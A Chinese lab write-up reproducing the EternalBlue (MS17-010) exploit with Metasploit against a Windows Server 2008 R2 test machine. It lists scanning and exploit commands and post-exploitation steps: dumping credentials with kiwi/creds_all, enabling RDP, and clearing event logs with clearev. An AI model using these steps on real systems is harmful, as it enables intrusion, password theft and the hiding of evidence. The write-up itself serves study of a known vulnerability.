永恒之蓝(MS17-010)漏洞复现

攻击机:win10

靶机:windows server 2008 r2

一:信息收集阶段

nmap:nmap 192.168.1.120

看到目标主机开启了445端口。存在被攻击的可能。

二、攻击准备阶段。

MSF(win版)

(1)查看可利用漏洞exp信息。

search ms17-010

(2)探测漏洞可否被利用。这里选择scanner,对目标主机进行扫描。

 执行命令:use 3 或者use auxiliary/scanner/smb/smb_ms17_010

show options

需设置rhosts和rport。

完成之后,输入命令run或者exploit进行执行。

 这里提示我们目标主机可能会被该漏洞利用。

(3)使用攻击模块进行攻击。

use 0

查看一下可攻击的系统版本。

show targets

这里看到可利用的版本包含了我们的版本。

选择exp

use 0

 这里默认payload就行。

设置目标地址

开始攻击

成功进入后渗透阶段。

开始进行信息收集。

sysinfo

?                       查看可执行的命令

获取用户名和密码。:load kiwi

获取失败,看到大佬说是64位需要进程迁移。

进程迁移:

load kiwi

creds_all

拿到密码

开启远程桌面:run post/windows/manage/enable_rdp

 用上一步的账号密码连接:

 

成功拿到权限。

记得清理记录:clearev

 

 

也可shell  获取shell交互权限。拿到相关信息。

 

 还有很多玩法,大家可自行探索。

 

  • 2
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

大西瓜的安全之路

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值